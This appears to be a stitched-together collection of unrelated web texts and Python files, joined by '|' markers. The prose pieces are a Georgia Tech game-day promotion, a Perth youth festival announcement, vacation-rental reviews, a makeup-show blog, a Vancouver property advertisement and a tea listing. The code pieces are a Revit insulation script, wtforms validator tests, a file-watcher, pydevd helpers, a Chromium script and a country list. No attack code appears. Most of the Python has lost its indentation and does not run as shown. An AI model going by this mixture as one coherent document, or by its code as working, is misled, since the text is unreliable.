Come to Fowler Street on campus 2.5 hours before kickoff of every home game to enjoy expanded activities for the entire family. New this year: live bands will play on Callaway Plaza prior to the start of each game. Saturday, “The Geeks” will go on stage at 4 p.m. Additionally, more inflatables, face painters, concessions and interactive promotions are planned for the entire family.
The Brock Family Indoor Practice Facility, the indoor practice facility for Yellow Jacket football, will be open to the public Saturday from 4-6 p.m. To view the facility, enter the building off Cherry Street, on the northwest side of the building.
Fans can greet the Tech football team on its walk to Bobby Dodd Stadium 2.5 hours prior to kickoff of every home game. The Yellow Jackets make the three-block walk down Brittain Drive with the band leading the way.
CLUB PATRON IN-SEAT SERVICE: In an effort to improve the VIP experience for our season ticket holders in our club section, a new in-seat service will be provided on game days so fans won’t miss a single play.
# coding: utf8
import rpw
from rpw import DB, revit
from rpw import logger
__doc__ = "Auto"
__title__ = "Auto Insulate"
__author__ = "Cyril Waechter"
__context__ = "Selection"
# TODO
def apply_size_rule(size, rule):
pass
def set_system_rule(mep_system):
# TODO: determine and return the insulation rule configured for this MEP system
pass
def get_element_mep_systems(element):
mep_system = []
if isinstance(element, DB.MEPCurve):
mep_system.append(element.MEPsystem)
elif isinstance(element, DB.FamilyInstance):
for connector in element.MEPModel.ConnectorManager.Connectors:
if connector.MEPSystem:
mep_system.append(connector.MEPSystem)
else:
logger.info("No system found in element {}".format(element))
return mep_system
def get_nominal_diameter(element):
if isinstance(element, DB.MEPCurve):
return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_DIAMETER_PARAM).AsDouble()
if isinstance(element, DB.FamilyInstance):
return 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
class ConnectorsBreadthFirstSearch:
def __init__(self, element):
self.element = element
self.nominal_diameter = 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
self.queue = [element]
self.visited = []
def outside_diameter_search(self):
if self.queue:
current_element = self.queue.pop(0)
print(current_element)
if isinstance(current_element, DB.Plumbing.Pipe):
return current_element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_OUTER_DIAMETER).AsDouble()
else:
self.visited.append(current_element)
for connector in current_element.MEPModel.ConnectorManager.Connectors:
for ref in connector.AllRefs:
if isinstance(ref.Owner, (DB.FamilyInstance, DB.Plumbing.Pipe)):
if ref.Owner not in self.visited and ref.Radius * 2 >= self.nominal_diameter:
self.queue.append(ref.Owner)
return self.outside_diameter_search()
else:
return self.nominal_diameter
def get_outer_diameter(element):
if isinstance(element, DB.Plumbing.Pipe):
return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_OUTER_DIAMETER).AsDouble()
if isinstance(element, DB.FamilyInstance):
# Walk connected elements until a pipe exposing an outer diameter is found.
for connector in element.MEPModel.ConnectorManager.Connectors:
for sub_con in connector.AllRefs:
logger.debug(sub_con.Owner)
diameter = get_outer_diameter(sub_con.Owner)
if diameter is not None:
return diameter
def get_inner_diameter(element):
if isinstance(element, DB.MEPCurve):
return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_INNER_DIAM_PARAM).AsDouble()
if isinstance(element, DB.FamilyInstance):
return 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
# InsulationLiningBase.GetInsulationIds
# for element in rpw.ui.Selection():
# element
# # TODO Determine system rule
# mep_systems = get_element_mep_systems(element)
# if mep_systems:
# rule = set_system_rule(mep_systems[0])
# # TODO Apply size rule
# apply_size_rule(size, rule)
# TODO GUI to set and save configuration
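# Illustrative usage sketch (hypothetical `selected_element`; mirrors the commented loop above):
# search = ConnectorsBreadthFirstSearch(selected_element)
# outer_diameter = search.outside_diameter_search()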
|
Saturday 23 June 2018 will see Perth celebrating the Year of Young People 2018 (YOYP2018) in spectacular style with a day-long event putting young people aged eight to 26 in the spotlight.
The Diverse CiTay Festival is supported by the Year of Young People 2018 event fund, managed by EventScotland, part of VisitScotland's Event Directorate. The day will highlight the best of Perth and Kinross, with an exciting mix of music, theatre, art, culture, sport, health and wellbeing as well as highlighting young entrepreneurs between 12.30pm and 10pm at various locations around the city centre. Diverse CiTay has been co-produced by local young people with support from local bodies and organisations.
In Perth Diverse CiTay will be a celebration of Perth and Kinross's young residents and visitors, highlighting the importance of young people to the future of our city, our region and our economy.
The festival kicks off at 12.30pm with a carnival parade: a colourful, vibrant display of floats, vehicles, dance troupes and bands will head from the South Inch along Tay Street to the North Inch park, where the North Inch Carnival will run from 1pm to 4.30pm with a lively mix of performers, entertainment and activities.
The Music Stage at the Carnival will be hosted by dance music giant Ministry of Sound, with sets from the House & Garage Orchestra, as seen on 1Xtra's Live Lounge, and very special guests Jack Maynard and Karen Harding. Also appearing on the Music Stage will be Dundee pop band Be Charlotte and Scottish singer-songwriter Mikey. Alongside this, there will be plenty of other things to enjoy including a funfair, inflatables, a bike stunt team, and much more.
If keeping healthy and active is more your thing, then the Perth College UHI Sports, Health & Wellbeing villages are for you! A range of sports from volleyball to archery, as well as a chill-out area and access to wellbeing activities and health advice, such as relaxation and meditation, and smoking cessation information, will be on offer.
Just a short walk away, between 5pm and 10pm, the Mill Street Youth Market will give young creators and business operators an opportunity to demonstrate their entrepreneurial spirit and creativity, offering a range of goods and services for sale, accompanied by food stalls, busking musicians, and a climbing wall. Local young musicians and bands will be featured on the Music Stage in the Horsecross plaza, with performances from Parliamo, Stop the Rain, Saharatheband and singer-songwriter Mikey, and DJ sets from Wize.
Nearby Perth Museum and Art Gallery will feature exhibitions created by local young people, focussing on the centenary of the end of World War One, and on self-image and identity. The exhibitions are free to attend and open from 10am to 5pm. Perthshire Creates' Summer Contemporary Design Market will also be held on the same day, in the Civic Hall at 2 High Street, Perth, presenting the best of locally produced arts and crafts between 10am and 4.30pm.
At the other end of Mill Street, a Youth Takeover of Perth Theatre will see a diverse range of free workshops, activities and events between 10am and 9.30pm. Fancy finding out more about theatre and stagecraft, or trying your hand at music, crafts or rapping and DJ skills? There's lots on offer, and the Takeover ends with an under 18's After Party, complete with silent disco and local bands performing.
Diverse CiTay Working Group Co-Chairs Robert McCall MSYP and Siusaidh Johnston commented: "In the Year of Young People 2018, we were keen to see a day that celebrates the achievements, ambition and interests of young people in Perth and Kinross. With the support of Perth & Kinross Council, Perth College UHI, Horsecross Arts and Culture Perth and Kinross, Diverse CiTay has been developed and co-produced by young people locally. There is so much going on in Perth city centre on Saturday 23 June that it would be a shame to miss it! If you live in Perth and Kinross and are aged eight to 26, please get involved and make it an incredible day for us all!"
Further information about the Diverse CiTay Festival and how you can get involved is available from the Perth City Centre website, perthcity.co.uk. |
#!/usr/bin/env python
from unittest import TestCase
from wtforms.validators import StopValidation, ValidationError, email, equal_to, ip_address, length, required, optional, regexp, url, NumberRange, AnyOf, NoneOf
try:
    unicode
except NameError:
    # Python 3 compatibility: `unicode` is no longer a builtin.
    unicode = str
class DummyTranslations(object):
def gettext(self, string):
return string
def ngettext(self, singular, plural, n):
if n == 1:
return singular
return plural
class DummyForm(dict):
pass
class DummyField(object):
_translations = DummyTranslations()
def __init__(self, data, errors=(), raw_data=None):
self.data = data
self.errors = list(errors)
self.raw_data = raw_data
def gettext(self, string):
return self._translations.gettext(string)
def ngettext(self, singular, plural, n):
return self._translations.ngettext(singular, plural, n)
def grab_error_message(callable, form, field):
try:
callable(form, field)
except ValidationError:
import sys
e = sys.exc_info()[1]
return e.args[0]
class ValidatorsTest(TestCase):
def setUp(self):
self.form = DummyForm()
def test_email(self):
self.assertEqual(email()(self.form, DummyField('[email protected]')), None)
self.assertEqual(email()(self.form, DummyField('[email protected]')), None)
self.assertEqual(email()(self.form, DummyField('[email protected]')), None)
self.assertEqual(email()(self.form, DummyField('[email protected]')), None)
self.assertRaises(ValidationError, email(), self.form, DummyField(None))
self.assertRaises(ValidationError, email(), self.form, DummyField(''))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo'))
self.assertRaises(ValidationError, email(), self.form, DummyField('bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@'))
self.assertRaises(ValidationError, email(), self.form, DummyField('@bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar'))
self.assertRaises(ValidationError, email(), self.form, DummyField('[email protected]'))
self.assertRaises(ValidationError, email(), self.form, DummyField('[email protected]'))
def test_equal_to(self):
self.form['foo'] = DummyField('test')
self.assertEqual(equal_to('foo')(self.form, self.form['foo']), None)
self.assertRaises(ValidationError, equal_to('invalid_field_name'), self.form, DummyField('test'))
self.assertRaises(ValidationError, equal_to('foo'), self.form, DummyField('different_value'))
def test_ip_address(self):
self.assertEqual(ip_address()(self.form, DummyField('127.0.0.1')), None)
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('abc.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('1278.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('127.0.0.abc'))
def test_length(self):
field = DummyField('foobar')
self.assertEqual(length(min=2, max=6)(self.form, field), None)
self.assertRaises(ValidationError, length(min=7), self.form, field)
self.assertEqual(length(min=6)(self.form, field), None)
self.assertRaises(ValidationError, length(max=5), self.form, field)
self.assertEqual(length(max=6)(self.form, field), None)
self.assertRaises(AssertionError, length)
self.assertRaises(AssertionError, length, min=5, max=2)
# Test new formatting features
grab = lambda **k : grab_error_message(length(**k), self.form, field)
self.assertEqual(grab(min=2, max=5, message='%(min)d and %(max)d'), '2 and 5')
self.assert_('at least 8' in grab(min=8))
self.assert_('longer than 5' in grab(max=5))
self.assert_('between 2 and 5' in grab(min=2, max=5))
def test_required(self):
self.assertEqual(required()(self.form, DummyField('foobar')), None)
self.assertRaises(StopValidation, required(), self.form, DummyField(''))
self.assertRaises(StopValidation, required(), self.form, DummyField(' '))
self.assertEqual(required().field_flags, ('required', ))
f = DummyField('', ['Invalid Integer Value'])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, required(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_optional(self):
self.assertEqual(optional()(self.form, DummyField('foobar', raw_data=['foobar'])), None)
self.assertRaises(StopValidation, optional(), self.form, DummyField('', raw_data=['']))
self.assertRaises(StopValidation, optional(), self.form, DummyField(' ', raw_data=[' ']))
self.assertEqual(optional().field_flags, ('optional', ))
f = DummyField('', ['Invalid Integer Value'], raw_data=[''])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, optional(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_regexp(self):
import re
# String regexp
self.assertEqual(regexp('^a')(self.form, DummyField('abcd')), None)
self.assertEqual(regexp('^a', re.I)(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField(None))
# Compiled regexp
self.assertEqual(regexp(re.compile('^a'))(self.form, DummyField('abcd')), None)
self.assertEqual(regexp(re.compile('^a', re.I))(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField(None))
def test_url(self):
self.assertEqual(url()(self.form, DummyField('http://foobar.dk')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.dk/')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.museum/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1:9000/fake')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://localhost/foobar')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://foobar')), None)
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar'))
self.assertRaises(ValidationError, url(), self.form, DummyField('foobar.dk'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://127.0.0/asdf'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.d'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.12'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://localhost:abc/a'))
def test_number_range(self):
v = NumberRange(min=5, max=10)
self.assertEqual(v(self.form, DummyField(7)), None)
self.assertRaises(ValidationError, v, self.form, DummyField(None))
self.assertRaises(ValidationError, v, self.form, DummyField(0))
self.assertRaises(ValidationError, v, self.form, DummyField(12))
onlymin = NumberRange(min=5)
self.assertEqual(onlymin(self.form, DummyField(500)), None)
self.assertRaises(ValidationError, onlymin, self.form, DummyField(4))
onlymax = NumberRange(max=50)
self.assertEqual(onlymax(self.form, DummyField(30)), None)
self.assertRaises(ValidationError, onlymax, self.form, DummyField(75))
def test_lazy_proxy(self):
"""Tests that the validators support lazy translation strings for messages."""
class ReallyLazyProxy(object):
def __unicode__(self):
raise Exception('Translator function called during form declaration: it should be called at response time.')
__str__ = __unicode__
message = ReallyLazyProxy()
self.assertRaises(Exception, str, message)
self.assertRaises(Exception, unicode, message)
self.assert_(equal_to('fieldname', message=message))
self.assert_(length(min=1, message=message))
self.assert_(NumberRange(1,5, message=message))
self.assert_(required(message=message))
self.assert_(regexp('.+', message=message))
self.assert_(email(message=message))
self.assert_(ip_address(message=message))
self.assert_(url(message=message))
def test_any_of(self):
self.assertEqual(AnyOf(['a', 'b', 'c'])(self.form, DummyField('b')), None)
self.assertRaises(ValueError, AnyOf(['a', 'b', 'c']), self.form, DummyField(None))
def test_none_of(self):
self.assertEqual(NoneOf(['a', 'b', 'c'])(self.form, DummyField('d')), None)
self.assertRaises(ValueError, NoneOf(['a', 'b', 'c']), self.form, DummyField('a'))
if __name__ == '__main__':
from unittest import main
main()
|
Love to shop: Marco offers a wide variety of boutiques and specialty shops to discover. For a faster pace, take a trip into Naples where you will find everything from malls, to designer outlets, to the fashionable Third Street South, and Fifth Avenue South areas with charming boutiques, galleries, and restaurants.
Time for dining: The choice is yours. There is everything from the good old American hamburger to haute cuisine. Kick back with a tropical drink at one of the chickee huts. Enjoy some of the finest seafood found anywhere, fresh out of the Gulf or the backwaters.
Ready to play? Florida's two most popular sports off the water would have to be tennis and golf, with courses and courts available throughout the Naples area.
Beautiful house! Very thoughtfully put together. The things that make a great holiday were all available. Airboat ride in the Everglades should not be missed!
Had a lovely stay. A lovely home with super pool, very comfortable, would like to come back!
Love your beautiful home! We've had a great time. Would recommend Tokyo Inn, Arturos, Jakes and a day out on the Marco River Marina rentals.
Loved this beautiful house! We recommend to go to Miami Beach, and the air boat riding at Speedy Johnsons on the Everglades.
We've had a great two weeks relaxing in your beautiful house!
Thank you for sharing your beautiful home with us. We've had a very relaxing week here after a Disney week in Orlando. The trip to "Speedy Johnsons" was very worthwhile. Our favorite dining was at Voyage while watching the sunset, and it's cheaper if seated before 8:30.
This was the relaxing part of our holiday after spending 11 days in Orlando doing the Disney tour. What a wonderful surprise to arrive at your splendid and most beautiful home. The children adored the pool - fantastic. Captain Doug House's Air boat one hour ride is out of this world. They even let the children drive the boat! Thanks so much.
Just a note to say we enjoyed our stay at your home in Marco Island last week. The weather was great all week. Thanks for allowing us to bring our two dachshunds with us. They have been making the trip with us since they were pups. The dogs really enjoy going out in the boat to fish. |
#!/usr/bin/python3
import argparse
import os
import subprocess
import time
import signal
# Avoid zombie process
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
# Exit after receiving Control-C
signal.signal(signal.SIGINT, signal.SIG_DFL)
parser = argparse.ArgumentParser(prog='watcher.py',
description='Simple filesystem watcher')
parser.add_argument('-l', '--files-list',
help='document with list of files to observe')
parser.add_argument('-f', '--files', nargs='*',
help='files to observe')
parser.add_argument('-c', '--command',
help='command to execute')
parser.add_argument('-n', '--no-shell', action='store_false',
help='do not use shell while evaluating command')
args = parser.parse_args()
if args.files_list is not None:
files = [line.rstrip('\n') for line in open(args.files_list)]
elif args.files:
files = args.files
else:
files = os.listdir()
# get initial modification time for files
for k, v in enumerate(files):
mtime = os.stat(v).st_mtime
files[k] = [v, mtime]
args.command = '' if not args.command else args.command
process = subprocess.Popen(args.command, shell=args.no_shell)
# watch & restart loop
while True:
reloaded = False
for k, v in enumerate(files):
mtime = os.stat(v[0]).st_mtime
if mtime != v[1] and not reloaded:
try:
process.wait(1)
except subprocess.TimeoutExpired:
# Still running: ask it to stop, then restart it with the same command.
process.send_signal(signal.SIGHUP)
process = subprocess.Popen(args.command, shell=args.no_shell)
reloaded = True
files[k][1] = mtime
time.sleep(1)
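# Example invocation (illustrative): restart a dev server whenever app.py changes.
#   ./watcher.py -f app.py -c 'python3 app.py'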
|
May has been bonkers, guys!
I covered The Makeup Show NYC the first weekend of May, and as always, it was packed with educational opportunities, brands to discover and LOTS of awesome shopping. But of course it’s almost Memorial Day and I’m finally getting around to my usual show recaps today!
So where to start… hmmm… I decided to break up my approach, because I typically throw it all into one post and it’s humongous. So how about a quick-hit list of the top things I heard from sessions I attended? This year I sought out education not just for blog and freelance fodder, but to soak it in as an aspiring makeup artist!
I attended Kevin James Bennett’s feature presentation, “Makeup Kit Breakdown,” to truly learn not just what a makeup artist might carry in their kit, but to understand what products and types of taskers artists rely on.
Keep it really simple. It’s easy to over pack your kit, but you don’t have to.
Consider the ingredients of your products – are you using wax-based? Oil-based? Cream-based? Are you being consistent across the board? Research and learn about ingredients and formulations and make a conscious decision about what you want to carry in your kit.
Always prep your client’s skin – even if they say they didn’t put anything on their face, cleanse and prep it!
He recommended great palettes for artists to keep on hand – like a color correcting palette and palette you can use to adjust the shade of foundation you’re working with.
Carry 100% pure silicone – it’s a great oil-absorbing agent and is a great primer. If you buff it onto skin before applying foundation you won’t need an oil control product.
Keep the conversation to a minimum while you’re working – it’s all about making the client feel and look good.
Keep matte neutral shadows and saturated brights in your kit.
You don’t need to go to school to become a makeup artist but learn technique, put the time in to get yourself educated and assist other makeup artists you admire.
“This is hard, it’s a job,” Kevin said.
There was a lot more education than I could attend, but I hope you enjoyed these insights from the sessions I was able to make! Is there anything here that resonates with you? I feel that sometimes the tips that are given to the artists attending this pro show are so applicable to all of us. Like knowing your strengths and weaknesses, and learning proper technique. I’d love to hear your thoughts! |
from __future__ import nested_scopes
import traceback
import os
try:
from urllib import quote
except ImportError:
from urllib.parse import quote  # @UnresolvedImport
from _pydevd_bundle import pydevd_constants
import sys
from _pydev_bundle import pydev_log
def save_main_module(file, module_name):
# patch provided by: Scott Schlesier - when script is run, it does not
# use globals from pydevd:
# This will prevent the pydevd script from contaminating the namespace for the script to be debugged
# pretend pydevd is not the main module, and
# convince the file to be debugged that it was loaded as main
sys.modules[module_name] = sys.modules['__main__']
sys.modules[module_name].__name__ = module_name
from imp import new_module
m = new_module('__main__')
sys.modules['__main__'] = m
if hasattr(sys.modules[module_name], '__loader__'):
setattr(m, '__loader__', getattr(sys.modules[module_name], '__loader__'))
m.__file__ = file
return m
def to_number(x):
if is_string(x):
try:
n = float(x)
return n
except ValueError:
pass
l = x.find('(')
if l != -1:
y = x[0:l-1]
#print y
try:
n = float(y)
return n
except ValueError:
pass
return None
def compare_object_attrs(x, y):
try:
if x == y:
return 0
x_num = to_number(x)
y_num = to_number(y)
if x_num is not None and y_num is not None:
if x_num - y_num < 0:
return -1
else:
return 1
if '__len__' == x:
return -1
if '__len__' == y:
return 1
return x.__cmp__(y)
except:
if pydevd_constants.IS_PY3K:
return (to_string(x) > to_string(y)) - (to_string(x) < to_string(y))
else:
return cmp(to_string(x), to_string(y))
def cmp_to_key(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj, *args):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) < 0
def __gt__(self, other):
return mycmp(self.obj, other.obj) > 0
def __eq__(self, other):
return mycmp(self.obj, other.obj) == 0
def __le__(self, other):
return mycmp(self.obj, other.obj) <= 0
def __ge__(self, other):
return mycmp(self.obj, other.obj) >= 0
def __ne__(self, other):
return mycmp(self.obj, other.obj) != 0
return K
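# Illustrative usage (hypothetical list): sort with the cmp-style comparator above.
# sorted(['b', '__len__', 'a'], key=cmp_to_key(compare_object_attrs))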
if pydevd_constants.IS_PY3K:
def is_string(x):
return isinstance(x, str)
else:
def is_string(x):
return isinstance(x, basestring)
def to_string(x):
if is_string(x):
return x
else:
return str(x)
def print_exc():
if traceback:
traceback.print_exc()
if pydevd_constants.IS_PY3K:
def quote_smart(s, safe='/'):
return quote(s, safe)
else:
def quote_smart(s, safe='/'):
if isinstance(s, unicode):
s = s.encode('utf-8')
return quote(s, safe)
def _get_project_roots(project_roots_cache=[]):
# Note: the project_roots_cache is the same instance among the many calls to the method
if not project_roots_cache:
roots = os.getenv('IDE_PROJECT_ROOTS', '').split(os.pathsep)
pydev_log.debug("IDE_PROJECT_ROOTS %s\n" % roots)
new_roots = []
for root in roots:
new_roots.append(os.path.normcase(root))
project_roots_cache.append(new_roots)
return project_roots_cache[-1] # returns the project roots with case normalized
def not_in_project_roots(filename, filename_to_not_in_scope_cache={}):
# Note: the filename_to_not_in_scope_cache is the same instance among the many calls to the method
try:
return filename_to_not_in_scope_cache[filename]
except KeyError:
project_roots = _get_project_roots()
filename = os.path.normcase(filename)
for root in project_roots:
if filename.startswith(root):
filename_to_not_in_scope_cache[filename] = False
break
else: # for else (only called if the break wasn't reached).
filename_to_not_in_scope_cache[filename] = True
# at this point it must be loaded.
return filename_to_not_in_scope_cache[filename]
def is_filter_enabled():
return os.getenv('PYDEVD_FILTERS') is not None
def is_filter_libraries():
return os.getenv('PYDEVD_FILTER_LIBRARIES') is not None
def _get_stepping_filters(filters_cache=[]):
if not filters_cache:
filters = os.getenv('PYDEVD_FILTERS', '').split(';')
new_filters = []
for new_filter in filters:
new_filters.append(new_filter)
filters_cache.append(new_filters)
return filters_cache[-1]
def is_ignored_by_filter(filename, filename_to_ignored_by_filters_cache={}):
try:
return filename_to_ignored_by_filters_cache[filename]
except KeyError:
import fnmatch
for stepping_filter in _get_stepping_filters():
if fnmatch.fnmatch(filename, stepping_filter):
pydev_log.debug("File %s ignored by filter %s" % (filename, stepping_filter))
filename_to_ignored_by_filters_cache[filename] = True
break
else:
filename_to_ignored_by_filters_cache[filename] = False
return filename_to_ignored_by_filters_cache[filename]
|
Innovation, flexibility, style – just three of the many words that describe IRONWORKS, a unique and inspiring offering of commercial real estate for sale in Vancouver, BC.
A rare opportunity to acquire ownership in a flagship commercial development in Vancouver, IRONWORKS is located at 220 Victoria Drive, in the heart of the growing Port Town community of East Vancouver. This is a place that thrives on hard work; where entrepreneurial spirit and neighbourly values converge.
IRONWORKS sets the standard for commercial real estate, with both office and warehouse spaces available for purchase. Meticulously designed to meld flexible use of space and functional design, with a modern flair that inspires vision and creativity, IRONWORKS is where successful entrepreneurs want to build their legacy.
IRONWORKS is where you want to be!
Considering commercial real estate for sale in Gastown, East Vancouver, or other areas near downtown? IRONWORKS will check the boxes on your wish list, and then some. Backed by stunning views of Burrard Inlet and the North Shore mountains, IRONWORKS is one of the most progressive and flexible offerings of commercial real estate for sale in Vancouver, building on the rich history of this unassuming, yet bustling neighbourhood.
There is no shortage of amenities in this unique neighbourhood. Grab a coffee and a quick breakfast from a nearby bakery. Do business over lunch along Commercial Drive or Hastings. Relax with an after-work beer at one of the East Van craft breweries. The possibilities are endless to fulfill your work-lifestyle balance, right here in Port Town.
Contact us to learn more about purchasing space for sale at IRONWORKS, Vancouver’s premier mixed-use commercial real estate opportunity.
*I agree to allow Ironworks Developments Ltd. and Cushman & Wakefield, on behalf of Ironworks to contact me and send me updates by phone or email. |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import re
COMPONENTS_DIR = 'components'
DESTINATION_COMPONENTS_DIR = 'components-chromium'
COMPONENT_SUMMARY =\
"""Name: %(name)s
Repository: %(repository)s
Tree: %(tree)s
Revision: %(revision)s
Tree link: %(tree_link)s
"""
def PrintSummary(info):
repository = info['_source']
resolution = info['_resolution']
tree = GetTreeishName(resolution)
# Convert to web link.
repository_web = re.sub(r'^git:', 'https:', re.sub(r'\.git$', '', repository))
# Specify tree to browse to.
tree_link = repository_web + '/tree/' + tree
print COMPONENT_SUMMARY % {
'name': info['name'],
'repository': repository,
'tree': tree,
'revision': resolution['commit'],
'tree_link': tree_link
}
def GetTreeishName(resolution):
"""Gets the name of the tree-ish (branch, tag or commit)."""
if resolution['type'] == 'branch':
return resolution['branch']
if resolution['type'] in ('version', 'tag'):
return resolution['tag']
return resolution['commit']
def main():
for entry in sorted(os.listdir(DESTINATION_COMPONENTS_DIR)):
component_path = os.path.join(COMPONENTS_DIR, entry)
if not os.path.isdir(component_path):
continue
bower_path = os.path.join(component_path, '.bower.json')
if not os.path.isfile(bower_path):
raise Exception('%s is not a file.' % bower_path)
with open(bower_path) as stream:
info = json.load(stream)
PrintSummary(info)
if __name__ == '__main__':
main()
|
Black tea "Curtis" Orange & Chocolate (25 count) is available for 3.29 from the RussianTable store, with delivery.
Brighten up your day with a summer mood by tasting the CURTIS Orange & Chocolate Tea that will fill you with energy for the whole day thanks to its unexpected combination of distinguished black tea and a flavor of chocolate and orange.
Do you have any questions about Black tea "Curtis" Orange & Chocolate (25 count)? |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import collections
"""List of countries the EVC uses."""
countries = collections.OrderedDict()
countries["Japan"] = ["日本", "Japan", "Japan", "Japon", "Japón", "Giappone", "Japan"]
countries["Argentina"] = ["アルゼンチン", "Argentina", "Argentinien", "Argentine", "Argentina", "Argentina", "Argentinië"]
countries["Brazil"] = ["ブラジル", "Brazil", "Brasilien", "Brésil", "Brasil", "Brasile", "Brazilië"]
countries["Canada"] = ["カナダ", "Canada", "Kanada", "Canada", "Canadá", "Canada", "Canada"]
countries["Chile"] = ["チリ", "Chile", "Chile", "Chili", "Chile", "Cile", "Chili"]
countries["Colombia"] = ["コロンビア", "Colombia", "Kolumbien", "Colombie", "Colombia", "Colombia", "Colombia"]
countries["Costa Rica"] = ["コスタリカ", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica"]
countries["Ecuador"] = ["エクアドル", "Ecuador", "Ecuador", "Equateur", "Ecuador", "Ecuador", "Ecuador"]
countries["Guatemala"] = ["グアテマラ", "Guatemala", "Guatemala", "Guatemala", "Guatemala", "Guatemala", "Guatemala"]
countries["Mexico"] = ["メキシコ", "Mexico", "Mexiko", "Mexique", "México", "Messico", "Mexico"]
countries["Panama"] = ["パナマ", "Panama", "Panama", "Panama", "Panamá", "Panamá", "Panama"]
countries["Peru"] = ["ペルー", "Peru", "Peru", "Pérou", "Perú", "Perù", "Peru"]
countries["United States"] = ["アメリカ", "United States", "Vereinigte Staaten", "Etats-Unis d’Amérique", "Estados Unidos de América", "Stati Uniti d'America", "Verenigde Staten"]
countries["Venezuela"] = ["ベネズエラ", "Venezuela", "Venezuela", "Venezuela", "Venezuela", "Venezuela", "Venezuela"]
countries["Australia"] = ["オーストラリア", "Australia", "Australien", "Australie", "Australia", "Australia", "Australië"]
countries["Austria"] = ["オーストリア", "Austria", "Österreich", "Autriche", "Austria", "Austria", "Oostenrijk"]
countries["Belgium"] = ["ベルギー", "Belgium", "Belgien", "Belgique", "Bélgica", "Belgio", "België"]
countries["Denmark"] = ["デンマーク", "Denmark", "Dänemark", "Danemark", "Dinamarca", "Danimarca", "Denemarken"]
countries["Finland"] = ["フィンランド", "Finland", "Finnland", "Finlande", "Finlandia", "Finlandia", "Finland"]
countries["France"] = ["フランス", "France", "Frankreich", "France", "Francia", "Francia", "Frankrijk"]
countries["Germany"] = ["ドイツ", "Germany", "Deutschland", "Allemagne", "Alemania", "Germania", "Duitsland"]
countries["Greece"] = ["ギリシャ", "Greece", "Griechenland", "Grèce", "Grecia", "Grecia", "Griekenland"]
countries["Ireland"] = ["アイルランド", "Ireland", "Irland", "Irlande", "Irlanda", "Irlanda", "Ierland"]
countries["Italy"] = ["イタリア", "Italy", "Italien", "Italie", "Italia", "Italia", "Italië"]
countries["Luxembourg"] = ["ルクセンブルク", "Luxembourg", "Luxemburg", "Luxembourg", "Luxemburgo", "Lussemburgo", "Luxemburg"]
countries["Netherlands"] = ["オランダ", "Netherlands", "Niederlande", "Pays-Bas", "Países Bajos", "Paesi Bassi", "Nederland"]
countries["New Zealand"] = ["ニュージーランド", "New Zealand", "Neuseeland", "Nouvelle-Zélande", "Nueva Zelanda", "Nuova Zelanda", "Nieuw-Zeeland"]
countries["Norway"] = ["ノルウェー", "Norway", "Norwegen", "Norvège", "Noruega", "Norvegia", "Noorwegen"]
countries["Poland"] = ["ポーランド", "Poland", "Polen", "Pologne", "Polonia", "Polonia", "Polen"]
countries["Portugal"] = ["ポルトガル", "Portugal", "Portugal", "Portugal", "Portugal", "Portogallo", "Portugal"]
countries["Spain"] = ["スペイン", "Spain", "Spanien", "Espagne", "España", "Spagna", "Spanje"]
countries["Sweden"] = ["スウェーデン", "Sweden", "Schweden", "Suède", "Suecia", "Svezia", "Zweden"]
countries["Switzerland"] = ["スイス", "Switzerland", "Schweiz", "Suisse", "Suiza", "Svizzera", "Zwitserland"]
countries["United Kingdom"] = ["イギリス", "United Kingdom", "Großbritannien", "Royaume-Uni", "Reino Unido", "Regno Unito", "Verenigd Koninkrijk"]
"""List of country codes."""
country_codes = [1, 10, 16, 18, 20, 21, 22, 25, 30, 36, 40, 42, 49, 52, 65, 66, 67, 74, 76, 77, 78, 79, 82, 83, 88, 94, 95, 96, 97, 98, 105, 107, 108, 110]
"""These lists tell the script how many entries are used for the position tables."""
"""(if it's more than 1, that must mean the region is split up into multiple parts)"""
position_table = collections.OrderedDict()
